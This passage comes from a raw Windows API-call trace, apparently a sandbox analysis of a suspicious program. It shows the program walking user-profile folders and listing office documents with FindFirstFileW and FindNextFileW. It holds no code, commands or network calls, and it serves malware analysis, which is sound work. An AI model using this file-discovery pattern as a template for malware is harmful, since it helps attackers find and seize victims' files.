dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x614d1880, ftCreationTime.dwHighDateTime=0x1d5ddd6, ftLastAccessTime.dwLowDateTime=0x94847160, ftLastAccessTime.dwHighDateTime=0x1d5e7f1, ftLastWriteTime.dwLowDateTime=0x94847160, ftLastWriteTime.dwHighDateTime=0x1d5e7f1, nFileSizeHigh=0x0, nFileSizeLow=0x14791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NjadnpP4bXfTr.csv", cAlternateFileName="NJADNP~1.CSV")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32599fa0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x6f35c8c0, ftLastAccessTime.dwHighDateTime=0x1d5b612, ftLastWriteTime.dwLowDateTime=0x6f35c8c0, ftLastWriteTime.dwHighDateTime=0x1d5b612, nFileSizeHigh=0x0, nFileSizeLow=0x9e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sRPKAC_i-r0gSL30it1J.docx", cAlternateFileName="SRPKAC~1.DOC")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e9397a0, ftCreationTime.dwHighDateTime=0x1d56e1a, ftLastAccessTime.dwLowDateTime=0xfb46b990, ftLastAccessTime.dwHighDateTime=0x1d58ec7, ftLastWriteTime.dwLowDateTime=0xfb46b990, ftLastWriteTime.dwHighDateTime=0x1d58ec7, nFileSizeHigh=0x0, nFileSizeLow=0x1241d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv6Gg5.pptx", cAlternateFileName="SV6GG5~1.PPT")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d61b0, ftCreationTime.dwHighDateTime=0x1d5cc6e, ftLastAccessTime.dwLowDateTime=0xba76dc90, ftLastAccessTime.dwHighDateTime=0x1d58aa0, ftLastWriteTime.dwLowDateTime=0xba76dc90, ftLastWriteTime.dwHighDateTime=0x1d58aa0, nFileSizeHigh=0x0, nFileSizeLow=0xf640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tTI9VeuENe.pptx", cAlternateFileName="TTI9VE~1.PPT")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eac6a0, ftCreationTime.dwHighDateTime=0x1d5a7a4, ftLastAccessTime.dwLowDateTime=0x5410dae0, ftLastAccessTime.dwHighDateTime=0x1d58664, ftLastWriteTime.dwLowDateTime=0x5410dae0, ftLastWriteTime.dwHighDateTime=0x1d58664, nFileSizeHigh=0x0, nFileSizeLow=0x89a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Uq-Qf59QnD_.pptx", cAlternateFileName="UQ-QF5~1.PPT")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e702860, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0x7b9ac0, ftLastAccessTime.dwHighDateTime=0x1d5e5cb, ftLastWriteTime.dwLowDateTime=0x7b9ac0, ftLastWriteTime.dwHighDateTime=0x1d5e5cb, nFileSizeHigh=0x0, nFileSizeLow=0x13f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WsiU9HhiMmh5taXUMi.odp", cAlternateFileName="WSIU9H~1.ODP")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X0h6NwRPaRX5m", cAlternateFileName="X0H6NW~1")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5b08260, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x2b34d7e0, ftLastAccessTime.dwHighDateTime=0x1d5e4b3, ftLastWriteTime.dwLowDateTime=0x2b34d7e0, ftLastWriteTime.dwHighDateTime=0x1d5e4b3, nFileSizeHigh=0x0, nFileSizeLow=0x3f33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zc2zwOgAl9dWZ8.pptx", cAlternateFileName="ZC2ZWO~1.PPT")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0a6be0, ftCreationTime.dwHighDateTime=0x1d5905a, ftLastAccessTime.dwLowDateTime=0xc3876800, ftLastAccessTime.dwHighDateTime=0x1d5c13b, ftLastWriteTime.dwLowDateTime=0xc3876800, ftLastWriteTime.dwHighDateTime=0x1d5c13b, nFileSizeHigh=0x0, nFileSizeLow=0x12c2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zp4bSgmkw1VmD6V.pptx", cAlternateFileName="ZP4BSG~1.PPT")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7084af40, ftCreationTime.dwHighDateTime=0x1d5ab43, ftLastAccessTime.dwLowDateTime=0xcd120a10, ftLastAccessTime.dwHighDateTime=0x1d5b56a, ftLastWriteTime.dwLowDateTime=0xcd120a10, ftLastWriteTime.dwHighDateTime=0x1d5b56a, nFileSizeHigh=0x0, nFileSizeLow=0x14c8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_33tr7aCFWUbIhs9iqCR.xlsx", cAlternateFileName="_33TR7~1.XLS")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7084af40, ftCreationTime.dwHighDateTime=0x1d5ab43, ftLastAccessTime.dwLowDateTime=0xcd120a10, ftLastAccessTime.dwHighDateTime=0x1d5b56a, ftLastWriteTime.dwLowDateTime=0xcd120a10, ftLastWriteTime.dwHighDateTime=0x1d5b56a, nFileSizeHigh=0x0, nFileSizeLow=0x14c8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_33tr7aCFWUbIhs9iqCR.xlsx", cAlternateFileName="_33TR7~1.XLS")) returned 0 [0227.752] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.752] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0227.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.753] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.753] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.753] PathFindFileNameW (pszPath="") returned="" [0227.753] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.753] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.753] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.753] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0227.753] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.753] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0227.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.753] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.754] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.754] PathFindFileNameW (pszPath="") returned="" [0227.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0227.754] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0227.754] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.754] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0227.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.754] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.755] PathFindFileNameW (pszPath="") returned="" [0227.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0227.755] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0227.755] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.755] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0227.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.755] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.755] PathFindFileNameW (pszPath="") returned="" [0227.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0227.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.756] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0227.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.756] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.756] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.756] PathFindFileNameW (pszPath="") returned="" [0227.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, 